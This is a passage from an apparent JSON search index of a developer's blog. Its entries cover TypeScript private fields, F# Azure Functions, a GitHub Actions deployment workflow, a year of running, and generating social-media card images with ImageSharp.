handling merge conflicts and deploying to Azure (and while Damian my chastise me for right-click deployments there may be another video coming soon 😉).\nSo grab a free Azure trial and check out the video.\n", "id": "2020-02-17-creating-functions-with-vscode" }, { "title": "How do ECMAScript Private Fields Work in TypeScript?", "url": "https://www.aaron-powell.com/posts/2020-01-23-typescript-ecmascript-class-private-fields/", "date": "Thu, 23 Jan 2020 09:51:02 +1100", "tags": [ "javascript", "typescript", "web" ], "description": "Let's have a bit of a dig into how a new TypeScript feature works", "content": "I was reading the release notes for the TypeScript 3.8 beta the other day and there’s a particular feature in there that caught my eye, Private Fields. This is support for the stage 3 proposal which means it’s a candidate for inclusion in a future language version (more info on the stages can be found here).\nWhat I found interesting is that although TypeScript has supported a private keyword it doesn’t actually make the field private, it just tells the compiler, meaning that in “plain old JavaScript” you can still access the field, whereas the Private Fields implementation makes it properly truly private, you can’t access it. So how does TypeScript do this while still generating valid JavaScript? This was something I wanted to learn.\nThe easiest way to figure this out is to look at the generated JavaScript from the TypeScript compiler, so let’s start with the sample from the blog post:\n1 2 3 4 5 6 7 8 9 10 11 class Person { #name: string constructor(name: string) { this.#name = name; } greet() { console.log(`Hello, my name is ${this.#name}!`); } } You’ll see the new syntax in the #name field that indicates it’s a private field. If we pass this through the compiler we’ll get this:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 "use strict"; var __classPrivateFieldSet = (this && this.__classPrivateFieldSet) || function(receiver, privateMap, value) { if (!privateMap.has(receiver)) { throw new TypeError( "attempted to set private field on non-instance" ); } privateMap.set(receiver, value); return value; }; var __classPrivateFieldGet = (this && this.__classPrivateFieldGet) || function(receiver, privateMap) { if (!privateMap.has(receiver)) { throw new TypeError( "attempted to get private field on non-instance" ); } return privateMap.get(receiver); }; var _name; class Person { constructor(name) { _name.set(this, void 0); __classPrivateFieldSet(this, _name, name); } greet() { console.log( `Hello, my name is ${__classPrivateFieldGet(this, _name)}!` ); } } _name = new WeakMap(); We’ll come back to the generated functions __classPrivateFieldSet and __classPrivateFieldGet shortly, let’s first look at the class:\n1 2 3 4 5 6 7 8 9 10 11 12 13 var _name; class Person { constructor(name) { _name.set(this, void 0); __classPrivateFieldSet(this, _name, name); } greet() { console.log( `Hello, my name is ${__classPrivateFieldGet(this, _name)}!` ); } } _name = new WeakMap(); Notice there’s a variable generated called _name that is an instance of a WeakMap. The WeakMap type in JavaScript is a special kind of key/value store that uses objects as the key, and we can see that in the constructor it calls _name.set(this, void 0);, so it’s initialising the value in the store to void 0 (which is a fancy way to write undefined). Now, if we were to give the field an initial value like this:\n1 2 class Person { #name: string = ""; It’s change the generated code to use _name.set(this, "");. Next it uses one of the generated functions, __classPrivateFieldSet, which does what you’d guess from the name, sets the value in the WeakMap for the current instance of the class to the value provided (it does some error checking too). Then when we want to access the value the __classPrivateFieldGet function is used to get the value back out of the WeakMap that contains it.\nSomething I also noticed when playing around is that if you were to add another private field:\n1 2 3 4 5 6 7 8 9 10 11 12 13 class Person { #name: string = ""; #age: number; constructor(name: string, age: number) { this.#name = name; this.#age = age; } greet() { console.log(`Hello, my name is ${this.#name} and I'm ${this.#age} years old!`); } } The generated code now looks like this:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 var _name, _age; class Person { constructor(name, age) { _name.set(this, ""); _age.set(this, void 0); __classPrivateFieldSet(this, _name, name); __classPrivateFieldSet(this, _age, age); } greet() { console.log( `Hello, my name is ${__classPrivateFieldGet( this, _name )} and I'm ${__classPrivateFieldGet(this, _age)} years old!` ); } } _name = new WeakMap(), _age = new WeakMap(); We’ve got two WeakMap’s, one for each of the fields.\nSummary TypeScripts use of the WeakMap and the instance of the class as the key is quite an ingenious one when it comes to doing private fields for a class, but I do wonder what the trade off would be in memory consumption, since every class will name n number of WeakMap instances, and do they take up much memory to the point it could be impactful?\nNone the less it does give me ideas for when I’m building applications and I want to have restricted access to parts of a type, using a WeakMap as a store might just do the trick.\n", "id": "2020-01-23-typescript-ecmascript-class-private-fields" }, { "title": "12 Months at Microsoft", "url": "https://www.aaron-powell.com/posts/2020-01-22-12-months-at-microsoft/", "date": "Wed, 22 Jan 2020 09:30:56 +1100", "tags": [ "career", "microsoft" ], "description": "Has it been that long already!", "content": "At the beginning for last year I joined Microsoft in the Cloud Advocates team and given it’s been around 12 months I wanted to do an update on my 6 months at Microsoft post.\nOver the 6 months since the last post things have settled down into a bit more of a routine. I wrote 34 articles since that one and writing is still the primary way in which I like to produce content. But whereas in the first 6 months at Microsoft I focused on ticking off a few things I’d been wanting to learn (like IoT and Golang) recently I’ve been going back more to my roots and focusing on content around JavaScript and .NET (particularly F#).\nI also spent a bit more time at events, and that is partially due to the back half of a year being event season in Australia. And while I might not have had the best success getting accepted I got myself to events across Melbourne, Sydney, Perth and Orlando (which is a grueling 24 hours transit each way).\nThe Only Constant is Change I joked at the end of my 6 months post that I’d survived my first reorg and maybe that was just foreshadowing as before 12 months was up I’d survived a second one! 🤣 (I’ve also had 4 manager changes in 12 months!)\nBut it’s not overly surprising, the CA team has just crossed the 3 year milestone which means that the original 3 year plan (like most companies we operate on a 3 year plan) has wrapped up and it’s time to look at how to drive the next 3 years.\nWhen I joined I was a Regional Cloud Advocate, meaning my focus was on the communities in Australia regardless of technology. This was a challenge because we’d have to be able to speak to a lot of technologies that we didn’t necessarily have experience in and we all naturally tended to drift towards the communities that aligned with out skillsets anyway. So a shift was made that we are now focused on particular technology verticals, which for me is JavaScript and .NET, and focus beyond just our region with that (but I want to focus more on the Australia communities anyway because at the very least it means a lot less travel!).\nThe Next 12 Months If I was to make a guess on what the next 12 months looks like I am pretty sure I’d be wrong about it! Ultimately, the high level goals are still the same, engage with development communities to work out what they need to support them growing and thriving. I have a busy travel schedule already planned out so you can see where I’ll be by looking at my talks calendar and I’m working on some internal projects that hopefully I can share soon.\nAs always I’m contactable if you want to learn more about what I do and how we as the CA team can help technical communities.\nUntil the next reorg! 🤣\n", "id": "2020-01-22-12-months-at-microsoft" }, { "title": "Creating Azure Functions in F#", "url": "https://www.aaron-powell.com/posts/2020-01-13-creating-azure-functions-in-fsharp/", "date": "Mon, 13 Jan 2020 09:03:42 +1100", "tags": [ "fsharp", "serverless", "azure-functions" ], "description": "Here's how to create Azure Functions in F# easily.", "content": "Last year I wrote a blog post on getting started with Azure Functions using F#. Sadly, it was a bit cumbersome as you needed to create a C# project and then convert it, and that was mainly so you got the right properties in the config file.\nThankfully though this has been improved as there are now F# templates for Azure Functions! Let’s have a quick look at how to get started with them.\nGetting The Templates Before getting started you’ll want to make sure you have the latest templates installed, so you have the latest NuGet packages referenced. To do that install the templates packages from NuGet, Microsoft.Azure.WebJobs.ProjectTemplates and Microsoft.Azure.WebJobs.ItemTemplates:\n$> dotnet new --install Microsoft.Azure.WebJobs.ItemTemplates $> dotnet new --install Microsoft.Azure.WebJobs.ProjectTemplates Installing these templates will add a bunch of new options to dotnet new for both C# and F#:\nTemplates Short Name Language Tags ------------------------------------------------------------------------------------------------------------------------------------------- DurableFunctionsOrchestration durable [C#] Azure Function/Durable Functions Orchestration SendGrid sendgrid [C#] Azure Function/Ouput/SendGrid BlobTrigger blob [C#], F# Azure Function/Trigger/Blob CosmosDBTrigger cosmos [C#], F# Azure Function/Trigger/Cosmos DB EventGridTrigger eventgrid [C#] Azure Function/Trigger/EventGrid EventHubTrigger eventhub [C#], F# Azure Function/Trigger/EventHub HttpTrigger http [C#], F# Azure Function/Trigger/Http IotHubTrigger iothub [C#] Azure Function/Trigger/IotHub ServiceBusQueueTrigger squeue [C#] Azure Function/Trigger/Service Bus/Queue ServiceBusTopicTrigger stopic [C#] Azure Function/Trigger/Service Bus/Topic QueueTrigger queue [C#] Azure Function/Trigger/Storage Queue TimerTrigger timer [C#], F# Azure Function/Trigger/Timer Azure Functions func [C#], F# Azure Functions/Solution Not all the triggers have an F# template provided, but there’s a number of good ones to get started with.\nCreating Our Solution With the templates installed we can create them from the CLI just like any other .NET project. Let’s start by creating a Functions solution:\n$> dotnet new func --language F# --name FunctionsInFSharp You’ll receive a success message and if we look on disk the files will be like so:\n$> ls FunctionsInFSharp.fsproj host.json local.settings.json Woo, we have our fsproj and ready to go with the right NuGet packages referenced.\nCreating a Function Finally, we want to create our Function itself, and again that’s something we can do from the .NET CLI:\n$> dotnet new http --language F# --name HttpTrigger This will create us a new file called HttpTrigger.fs alongside the project file using the http template (for a HttpTrigger function). Since F# needs the files to include in compilation to be in the fsproj file, make sure you pop open the fsproj file and include it within an <ItemGroup>:\n1 <Compile Include="HttpTrigger.fs" /> Now if you open this in VS Code it’ll be detected as a Azure Functions project and prompt you to setup the VS Code Extension and artifacts, then it’s a matter of hitting F5 to launch!\nConclusion There we have it folks, a much simpler way to create an F# Azure Function using the provided templates. No more remembering what NuGet packages to reference, renaming of csproj files or working out what additional properties are needed in the project file to make one from scratch.\nHappy F#‘ing!\n", "id": "2020-01-13-creating-azure-functions-in-fsharp" }, { "title": "Deploying Azure Functions With Github Actions", "url": "https://www.aaron-powell.com/posts/2020-01-10-deploying-azure-functions-with-github-actions/", "date": "Fri, 10 Jan 2020 13:34:00 +1100", "tags": [ "serverless", "azure-functions", "devops", "azure" ], "description": "Looking to deploy Azure Functions with GitHub Actions? Here's how to get started.", "content": "When I was creating my Azure Functions to generate social images I decided to give GitHub Actions a spin as the deployment tool, after all, I quite liked them when I updated my blog. So let’s have a look at how to use GitHub Actions to deploy Azure Function.\nThere’s a lot of context and terminology on getting started with GitHub Actions in my other blog post that I’d encourage you to read first if you’re new to GitHub Actions, since I won’t cover it all in detail here.\nSetting Up Our Action We’ll start by creating our GitHub Action file at .github/workflows/devops-workflow.yml in our git repo:\n1 2 3 4 5 6 7 8 9 10 11 name: Build and Deploy env: OUTPUT_PATH: ${{ github.workspace }}/.output DOTNET_VERSION: "3.1.100" on: push: branches: - master jobs: We’ll use some environment variables for the output and .NET version (since the Functions in my image generator are .NET Functions, but you don’t need that if they are non-.NET that you’re using) and specify that this workflow will only run when code is pushed to the master branch.\nThe Build Job If it’s a .NET Function we’ll need to compile it, if it’s Node.js install the npm packages, use pip if it’s Python and Maven for Java. This is what the role of the Build job will handle, preparing the assets we need to deploy to Azure, so let’s create a Build job:\n1 2 3 4 5 6 7 8 9 10 11 12 13 build: runs-on: ubuntu-latest steps: - name: "Checkout" uses: actions/checkout@master - name: Setup Dotnet ${{ env.DOTNET_VERSION }} uses: actions/setup-dotnet@v1 with: dotnet-version: ${{ env.DOTNET_VERSION }} - name: Publish functions run: dotnet publish --configuration Release --output ${{ env.OUTPUT_PATH }} This will use the actions/setup-dotnet@v1 Action from the marketplace to install the right version of .NET (based on our environment variable) and use the .NET CLI to publish the output.\nNow it’s time to package the output for the deployment job:\n1 2 3 4 5 - name: Package functions uses: actions/upload-artifact@v1 with: name: functions path: ${{ env.OUTPUT_PATH }} Tada 🎉! You have an artifact for the Functions, ready to be deployed.\nThe Deployment Job 1 2 3 4 5 deploy: runs-on: ubuntu-latest needs: [build] env: FUNC_APP_NAME: blogimagegenerator Since the deploy job will need the artifacts from the build job we’ll set it up as a dependency using the needs: [build], otherwise we’d deploy before the Functions were built, and that’s not going to work!\n1 2 3 4 5 6 7 8 9 10 11 steps: - name: Download website uses: actions/download-artifact@v1 with: name: functions path: ${{ env.OUTPUT_PATH }} - name: "Login via Azure CLI" uses: azure/login@v1 with: creds: ${{ secrets.AZURE_CREDENTIALS }} Using the actions/download-artifact@v1 we can get the output from the build job and then it’s time to log in to Azure using the credentials we’d previously generated (see my last blog post for information about that).\nThe last piece of the puzzle is to use the Azure/functions-action@v1 GitHub Action from the marketplace:\n1 2 3 4 5 - name: "Run Azure Functions Action" uses: Azure/functions-action@v1 with: app-name: ${{ env.FUNC_APP_NAME }} package: ${{ env.OUTPUT_PATH }} This requires the name of the Function App that we’re deploying into to be provided as the app-name parameter (we’ve stored it in an environment variable named FUNC_APP_NAME).\nAnd with that the workflow is complete, ready to deploy your Functions to Azure. You can find the full file on my GitHub along with a recent run if you’re curious on the output.\nConclusion With only 53 lines we can create a GitHub Action that will deploy Azure Functions each time we push to a branch, which I think is pretty simple.\nI’ve covered off how to do it with a .NET Function, but if you want to check out how to do it with other languages head on over to the Azure Function docs.\n", "id": "2020-01-10-deploying-azure-functions-with-github-actions" }, { "title": "1,000km", "url": "https://www.aaron-powell.com/posts/2020-01-06-1000km/", "date": "Mon, 06 Jan 2020 07:47:18 +1100", "tags": [ "running" ], "description": "A story of my running in 2019.", "content": "I like to run, it’s my exercise, my escape. I’ve tried gym programs, had weights at home, stuff like that but I’ve never gotten into it like running.\nGrowing up I played field hockey so I’ve always had decent cardio fitness and would sometimes go for a run around the block for some extra training. Then, about 6 years ago my wife started a fitness program and go into running so I joined in and she introduced me to an event she’d learnt about, parkrun. For those unfamiliar with parkrun it’s a free, timed 5km event that happens every weekend in parks all around the world (it originated in England). It’s not a race, the only person you’re trying to beat is yourself. When you finish your run, or walk, you scan your barcode and get a time for the day.\nSo parkrun is part of mine and my wife’s weekly ritual, we get up on Saturday morning and head to our local parkrun and run it (now we run it pushing a pram). When we’re traveling over a weekend we’ll try and find a parkrun that one of us can get to; like the time I was in Copenhagen on a family holiday and left my wife and kids at our Airbnb while I cycled ~7km to a random park to do parkrun (and then had to cycle back)!\nBy and large, this was my exercise, occasionally I’d sign up for a half marathon and thus increase my running distance and frequency (but never as much as I probably should have and that’d annoy my wife when I’d “just run it” in a decent time anyway 😛) but then I’d taper off again.\nComing into 2019 I decided I wanted to put a bit more effort into my running. Over the years I’ve run I’ve talked to different people about goals and one that’s come up is the 1,000km goal, running 1,000km in 12 months. So I decided a distance goal would be what I wanted for 2019 but given that in 2018 I’d only done a touch over 400km 1,000km seemed a bit ambitious, thus I settled on a more obtainable goal of 750km.\nEven still, 750km seems like a lot of distance to cover in a year until you start breaking it down. To do it you need to run 15km per week, over 50 weeks, leaving 2 weeks for illness/injury/travelling/etc.\nNow it’s starting to look obtainable. I already run 5km per week at parkrun and at the end of 2018 I’d rejoined some friends I use to run with for a weekly Wednesday that alternates between intervals or hills which nets 8km or 7km, depending on the week. Conservatively I’m already at 12km for the week so if I run to my nearest parkrun, which is 3km away, that’s 15km for the week done!\nAfter a few weeks I was feeling good and 2 runs a week no longer felt like “enough”, I was itching for another run and to increase my distance.\nAt this point I was averaging around the 17km per week as I figured it’d be better to bank a few km’s in case I got injured but I started to think that maybe 1,000km was possible.\nOk, back to the maths. To do 1,000km you need to run 20km per week average (leaving the same 2-week buffer) which would mean that I’d have to start running more than 20km to make up for the deficit I already had. I started to push 23km - 25km per week by throwing in an extra run or two.\nAnd then, on the 21st December, I jogged to parkrun so that when I hit the 4km mark I’d tick over 1,000km for 2019 (I’d needed to do 7km for the day I wanted to make sure I didn’t track a short course on the run)! I ended up finishing 2019 doing 1,023km across 164 runs in a total of 79.5 hours (according to Strava, and if it’s not on Strava, it didn’t count).\nMilestones, Pace and Injury This is the most I’ve run in a year by few hundred km’s and over double what I’d done the year prior so it was a bit of a learning experience and it did also result in me being able to achieve a few milestones.\nI finally beat my PB at my home parkrun, a PB that’d stood for about 5 years, by finally getting sub-20 minutes again (19:50 to be exact)! I also managed to get sub-20 at 5 other parkrun’s in 2019 (ok, one was New Years Day, but it totally counts), with a 5km PB now sitting at 19:30. I’m still pretty shocked at this and it’s going to be hard-pressed to top that many PB’s in a year again.\nI also got back into doing some races. With the arrival of our kids and a shift in priorities doing races was something that I’d dropped. It didn’t bother me that much, the last few times I’d done half marathons I’d not trained properly and ended up injured during the run and just slogging out the last ~5km which isn’t fun. But with my body feeling good and my running being consistent I picked a goal that I’d had for a while, sub-60 minutes City2Surf.\nIf you’re unfamiliar with City2Surf it’s a 14km run from Sydney’s CBD out to Bondi Beach and it’s Australia’s largest fun run with over 80,000 attendees. It’s a notoriously tough course and not just because of Heartbreak Hill (an approximately 2km uphill). I’ve run the event in the past, but not since our eldest was born, so my PB of 62:30 was 5 years ago. But now I’m training properly and I should be in a good place to tackle it.\nAbout 6 weeks out from the event I started to up my hill training and subsequently overloaded one of my achilles tendons and I was struggling to walk. After a few weeks of physio and slowly getting back into it I was able to start doing some hill work again but nowhere near what I was wanting to tackle and several weeks late. But, entry was paid for and damnit I was going to run.\nDay of the run I went in with a game plan, an idea on how I’d tackle the run to try and get my sub-60 minute time but it would be tough. Coming over the crest of Heartbreak Hill and knowing I was only halfway through I was spent. Mentally I resided to the fact that I wouldn’t do it but I was determined to not be slower than the last time I ran! Coming through the last few km’s I’d stopped looking at my watch, I could no longer do the maths to work out what time I’d need to hit each km to make it, but we were running downhill so I just went for it (cracking out a 3:40 min/km 13th km!) finishing in 59:23. I was destroyed as a result of it though, it was about 3 days before it stopped hurting to walk and I ended up with gastro (which sucks when it hurts to walk) but I think that was more from sheer exhaustion than anything.\nConclusion All in all, it was a good year, I hit my stretch goal, did 3 races, ruined 1 pair of shoes, had minimal injuries and got a bit faster overall.\nWhat I found was most helpful for this was being consistent in my running. Sure, there were mornings in winter where it was dark and cold but I was still out with some friends running by the light of head torches; there were nights where I hadn’t had much sleep due to sick kids, but I still dragged myself out of bed to run, complaining the whole time; there were days where my body was stiff but I’d use the run to shake it off.\nI’ll aim for the 1,000km again in 2020, I’m not ready to go beyond that… Yet. 😉\n", "id": "2020-01-06-1000km" }, { "title": "Generating Images with Azure Functions", "url": "https://www.aaron-powell.com/posts/2020-01-03-generating-images-with-azure-functions/", "date": "Fri, 03 Jan 2020 09:18:30 +1100", "tags": [ "fsharp", "serverless" ], "description": "How I created a little service to create social media images for my blog.", "content": "Since I converted my blog to a static website whenever posts were shared on social media, which I automatically do via my RSS feed, you’d see something like this in your timeline.\nIt looked no better in Slack.\nNow sure, I’m a handsome guy and that is a great photo if I do say so myself, but do you really need a massive picture of me to adorn a timeline? After all, it doesn’t do much to relate back to the post in question does it?\nSo when I decided to embark on the rebuilt of my website recently this was one of the things I wanted to fix was that.\nOpen Graph Protocol Before looking into how I do things better let’s just look at what we’re working with. When you share links on social sites such as Twitter, Facebook, LinkedIn, etc. they will look for some additional metadata on the page called the Open Graph Protocol. This protocol started its life in Facebook as a way to embed more information into the social graph that they generate around anything shared on the platform, but over time it’s become a bit of a defacto standard in social graph markup so other sites have adopted it.\nSpecifically the image comes from the <meta property="og:image" content="..." /> meta property, and there are a number of other meta properties that are useful to markup the social graph.\nSo when a link is shared the service will request the HTML, look for this metadata and if it exists, embed it in a “card” to make your link more appealing (at least, in theory).\nA Better Open Graph Image In my original theme the og:image was hard coded so that every page used the same image file, which I’m sure was fine for how the theme author intended the theme to be used, but in my usage of it, it was sub-optimal.\nI’ve been spending quite a bit of time on DEV this past year and one thing I like about it is that when you share a link there’s a really nice og:image.\nYou can also optionally upload an image to be the “cover image” which will become the og:image so it doesn’t use the generated card but something you can control.\nI decided that I wanted to try and replicate this, allow for me to control the og:image and if there isn’t one, generate a title card like DEV does.\nDynamic Static Images Everything I need for my website lives in the git repo, including all images. This does mean that the repo is getting larger over time as I blog more and add more rich media to the posts, so I wanted to be careful about how I added these new og:image images. I also didn’t want to make the build pipeline more complex, I think my GitHub Actions process is really quite slick, so I decided that I’d make an API endpoint to generate the images for me, or return a previously generated one, so let’s take a look at how to do that.\nGenerating Images in .NET I decided I’d create an Azure Function in F# to handle this problem and to generate the images I’d use the open source ImageSharp library (I’ve used the 1.0.0-beta0009 and 1.0.0-beta0007 packages which are the latest across a few of the dependencies I needed at the time of writing).\nImageSharp is a very low-level image manipulation library and can be used to work with existing images allowing you to edit, crop, transform, etc. but in this post we’re going to create the image entirely via code as it gives us the flexibility to tweak it over time.\nBuilding Our Function Let’s start by defining a HTTP Trigger Function and combine it with a Blob input binding that will give access to the previously generated image (if there is one). The HTTP binding will have an ID for the post we’re generating the image for:\n1 2 3 4 5 6 module BlogCardGenerator = [<FunctionName("BlogCardGenerator")>] let run ([<HttpTrigger(AuthorizationLevel.Function, "get", Route = "title-card/{id}")>] req: HttpRequest) ([<Blob("title-cards/{id}.png", FileAccess.ReadWrite, Connection = "ImageStorage")>] postImage: ICloudBlob) (id: string) (log: ILogger) = NotFoundResult() With the scaffolding in place, let’s start building our image generator!\nLimiting Abuse We’re creating an unsecured API endpoint that allows people to provide a bit of data to via a GET request which will generate an image that is stored in storage. This doesn’t sound like the kind of thing that could be abused does it… Since the og:image URL needs to be unsecured we needed to think of a creative way to validate that what is being requested is actually for a post on my blog. But since it’s all markdown files in GitHub how can we validate that?\nIt turns out that that isn’t too hard thanks to the work done to create my search app. For this to work we generate a JSON file that is deployed as part of my website (although it doesn’t need to be anymore, but I’m just too lazy to exclude it), so my website has a list of all posts in JSON (there also exists a list in XML which is the RSS output that could be used instead) and that’s what we can use to validate against.\nAlso, the advantage of having this “database” available is that we don’t need to pass anything more than an ID to the post in the API call, since all the metadata is in the JSON file anyway.\nWe’ll use the JSON Type Provider to create a strongly typed way of accessing the blog posts. In a new file called RequestValidator.fs we’ll create the module:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 module RequestValidator open FSharp.Data [<Literal>] let JsonExample = """ { "posts": [{ "title": "Post Title", "date": "Tue, 17 Dec 2019 08:50:14 +1100", "tags": ["tag", "tag2"], "id": "Test" }] } """ type Blog = JsonProvider<JsonExample> let getBlogMetadata() = Blog.AsyncLoad "https://www.aaron-powell.com/index.json" let tryFindPost (id: string) (blogs: Blog.Post array) = blogs |> Array.tryFind (fun blog -> blog.Id = id) A string represents the structure of the JSON (so the Type Provider knows what types to generate) and then two functions are exposed from the module, getBlogMetadata which downloads the JSON using the Type Provider to give us the object graph and tryFindPost which will return an Option when matching the blog by the provided ID.\nTime to incorporate this into the Function:\n1 2 3 4 5 6 7 8 9 10 11 12 13 [<FunctionName("BlogCardGenerator")>] let run ([<HttpTrigger(AuthorizationLevel.Function, "get", Route = "title-card/{id}")>] req: HttpRequest) ([<Blob("title-cards/{id}.png", FileAccess.ReadWrite, Connection = "ImageStorage")>] postImage: ICloudBlob) (id: string) (log: ILogger) = async { log.LogInformation <| sprintf "ID: %s" id let! blogData = getBlogMetadata() match tryFindPost id blogData.Posts with | Some post -> return OkResult() :> IActionResult | None -> return NotFoundResult() :> IActionResult } |> Async.StartAsTask Since getBlogMetadata is an async function we have wrapped the function in an async computation expression and used let! to invoke the method. But the Functions host doesn’t understand the F# async API so we have to convert it back to a Task, and that’s done with Async.StartAsTask. Once the metadata is downloaded it’s converted into the object structure we expect and our tryFindPost method is called with a match expression to either go does a happy path Some post or an unhappy path None, with the latter to be used when the API is being called by someone trying to be tricky. Lastly, we have to cast the result to a common base type, which IActionResult is ideal for, as F# doesn’t do implicit casting, so we have to ensure that every return is returning the same type.\nChecking Image Cache We don’t want to generate the images every time, it’d be much more preferable to only generate the images once and then future requests can use that image. This is where the Blob input binding comes in. To use this binding we need to provide it with:\nThe name of the Blob to bind to (title-cards/{id}.png) This can use a binding expression that’s shared with the Trigger action, so in this case we can use the ID that comes in on the HTTP trigger on the Blob binding Access Mode, in our case we need it to be FileAccess.ReadWrite The name of the connection string This is optional, it’ll use the storage account of the Function if not provided This is then bound to a type of ICloudBlob which gives us an API to query information about the Blob as well as grab a copy or upload to it, think of it as a proxy container.\nSince the Blob might not exist though we need to check that first, and if it does, send it in the response, otherwise we’ll generate a new image.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 let downloadImage (postImage: ICloudBlob) = async { let ms = new MemoryStream() do! postImage.DownloadToStreamAsync ms |> Async.AwaitTask ms.Position <- int64 0 return ms } [<FunctionName("BlogCardGenerator")>] let run ([<HttpTrigger(AuthorizationLevel.Function, "get", Route = "title-card/{id}")>] req: HttpRequest) ([<Blob("title-cards/{id}.png", FileAccess.ReadWrite, Connection = "ImageStorage")>] postImage: ICloudBlob) (id: string) (log: ILogger) = async { log.LogInformation <| sprintf "ID: %s" id let! blogData = getBlogMetadata() match tryFindPost id blogData.Posts with | Some post -> let! exists = postImage.ExistsAsync() |> Async.AwaitTask if exists then log.LogInformation "Image existed" let! ms = downloadImage postImage return FileStreamResult(ms, "image/png") :> IActionResult else // todo: generate image return OkResult() :> IActionResult | None -> return NotFoundResult() :> IActionResult } |> Async.StartAsTask On line 19 we use ExistsAsync on the ICloudBlob to see if the blob we’ve requested from storage exists already and if it does the downloadImage function creates a new MemoryStream that the ICloudBlob will be streamed into using the DownloadToStringAsync function so that we can return the stream in the FileStreamResult on line 24 (on line 5 we reset the stream position to 0 so the response can read it). If it doesn’t exist, we’ll need to create the image using ImageSharp.\nCreating Our Image We’ve made a request for an image but it turns on that it doesn’t exist yet, guess we’d better try and generate one, but how do we go about doing that? First, we need to think about what the image we want to generate looks like. Let’s look back at the DEV image we want to replicate:\nIt’s a rectangle with rounded corners top left and right, a drop shadow, the title of the post with the author’s name below in slightly smaller font and some other little images. I’m going to ditch the avatar of myself (useful on DEV since many people blog, but not on my site) and I’m going to ditch the icons since I’m lazy.\nDrawing A Box With Rounded Corners Seems like a pretty straight forward requirement, draw a box with two rounded corners, but of course it wont be that simple. To do this with ImageSharp we’ll use the SixLabors.Shapes NuGet package (1.0.0-beta0009 version at the time of writing) as it gives us some primitives to work with such as RectangularPolygon and EllipsePolygon.\nThe reason that we’ll need these two types is that a box with rounded corners isn’t a primitive shape, those are rectangles (or squares if the height and width match), ellipse (or a circle if the height and width match), lines, triangles, things like that. This means we’ll need to get tricky and layer a few shapes on top of each other.\nThis image shows what we’re going to have to create and I’ve coloured each of the main components. In our solution we’ll colour them the same, but this helps understand the problem.\nLet’s create a new file called ImageCreator.fs and start scaffolding out how we’ll make the box (I’ll omit the open statements for brevity):\n1 2 3 4 module ImageCreator let generateBox (colour: Color) (width: float32) (height: float32) (image: Image<Rgba32>) = image There’s a lot of arguments to this function, some of them are self explanatory (width, height, colour) and then there’s some like image which is the drawing canvas from ImageSharp.\nNow we can draw what I call the “inner box”, which is the yellow one from the image above, and this is skinnier than the full box by the radius of the rounded corner.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 module ImageCreator let cornerRadius = 10.f let gutter = 20.f let generateBox (colour: Color) (width: float32) (height: float32) (image: Image<Rgba32>) = let xStart = gutter + cornerRadius let yStart = gutter + cornerRadius image.Mutate (fun ctx -> ctx.Fill (GraphicsOptions(true), colour, RectangularPolygon(xStart, yStart, width - xStart - gutter - cornerRadius, height - yStart - gutter)) |> ignore) image With ImageSharp we use a Mutate function on the Image object which we provide a function that takes a IImageProcessingContext (called ctx in the above snippet) that we can manipulate the image from. Because ImageSharp is designed for C# it’s a bit clunky to work with in F# due to the chained API and that F# does implicit returns not explicit like C#, so we’ll use a lot of |> ignore pipes.\nFrom the ctx we will call Fill and provide GraphicsOptions (which we can control the antialiasing of the image) and the colour, then we can start to draw on the canvas with something, in this case, a RectangularPolygon. For the generated image let’s set a 20px gutter around it, so we start the rectangle at the coordinates 30x 30y so that we can have a 10px rounded corner that sits above this box. This is because if the box started at the same x/y as the rounded corner you’d see the corner of the box poking through underneath, so it has to have a slight offset. If you wanted a more dynamic corner sizing then you might pass in the radius of the circle and calculate the x/y offset. Next we need the height and width of the rectangle; height is simple, it’s the total canvas height (height) less our gutter (20px) less the y starting position (30px), so height - gutter - yStart; width is similar, except we also need to subtract the corner radius, so it is width - xStart - gutter - cornerRadius.\nCongratulations, you’ve drawn a rectangle!\nNow it’s time to add our rounded corners, which we’ll do by creating some circles.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 module ImageCreator let cornerRadius = 10.f let gutter = 20.f let generateBox (colour: Color) (width: float32) (height: float32) (image: Image<Rgba32>) = let xStart = gutter + cornerRadius let yStart = gutter + cornerRadius image.Mutate(fun ctx -> ctx.Fill (GraphicsOptions(true), colour, RectangularPolygon(xStart, yStart, width - xStart - gutter - cornerRadius, height - yStart - gutter)) |> ignore) // rounded corner - left top image.Mutate(fun ctx -> ctx.Fill(GraphicsOptions(true), colour, EllipsePolygon(xStart, yStart, cornerRadius * 2.f, cornerRadius * 2.f)) |> ignore) // rounded corner - right top image.Mutate(fun ctx -> ctx.Fill (GraphicsOptions(true), colour, EllipsePolygon(width - xStart, yStart, cornerRadius * 2.f, cornerRadius * 2.f)) |> ignore) image We’re now using EllipsePolygon to generate a an ellipse with an equal width and height to make it a circle not an oval, and we’ll do it twice, one for each corner. We provide an x & y position for the centre of the ellipse, rather than the top-left corner like a rectangle, so that width and height can be appropriately applied. For our left corner we’ll use the same xStart and yStart to draw outwards from and then specify the height and width is double the radius, since these values represent the diameter. With the circles drawn our image will look like this:\nAwesome! Now all we need to do is fill in the gaps between the circles and the inner box then everything should be set!\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 module ImageCreator let cornerRadius = 10.f let gutter = 20.f let generateBox (colour: Color) (width: float32) (height: float32) (image: Image<Rgba32>) = let xStart = gutter + cornerRadius let yStart = gutter + cornerRadius image.Mutate(fun ctx -> ctx.Fill (GraphicsOptions(true), colour, RectangularPolygon(xStart, yStart, width - xStart - gutter - cornerRadius, height - yStart - gutter)) |> ignore) // rounded corner - left top image.Mutate(fun ctx -> ctx.Fill(GraphicsOptions(true), colour, EllipsePolygon(xStart, yStart, cornerRadius * 2.f, cornerRadius * 2.f)) |> ignore) // rounded corner - right top image.Mutate(fun ctx -> ctx.Fill (GraphicsOptions(true), colour, EllipsePolygon(width - xStart, yStart, cornerRadius * 2.f, cornerRadius * 2.f)) |> ignore) // left gutter image.Mutate (fun ctx -> 